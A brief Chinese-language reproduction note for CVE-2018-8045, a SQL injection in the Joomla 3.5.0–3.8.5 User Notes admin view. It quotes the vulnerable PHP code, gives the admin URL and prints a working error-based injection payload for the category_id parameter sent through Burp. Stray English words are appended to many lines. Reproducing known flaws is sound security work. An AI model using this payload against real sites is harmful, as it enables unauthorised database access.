CVE-2018-8045php
受影響版本:joomla!3.5.0-3.8.5git
漏洞描述:github
joomla!3.5.0-3.8.5版本對sql語句內的變量缺乏類型轉換,致使User Notes列表視圖內SQL注入漏洞。sql
從github上下載代碼並安裝。this
產生漏洞的文件爲:"/administrator/components/com_users/models/notes.php";url
代碼在126-121行spa
$categoryId = $this->getState('filter.category_id'); if ($categoryId && is_scalar($categoryId)) { $query->where('a.catid = ' . $categoryId); }
很明顯$categoryId變量沒有過濾或者類型轉換直接帶入SQL語句執行。致使SQL注入漏洞產生。scala
訪問url:http://localhost/joomla/administrator/index.php?option=com_users&view=notescode
選擇Search Tools選項並選擇Uncategorised便可觸發漏洞條件,這時候用burp抓包。component
發現category_id參數,咱們在repeater中發包,將該參數值改成7 and extractvalue(1,concat(0x7e,(select database()),0x7e))
成功復現漏洞。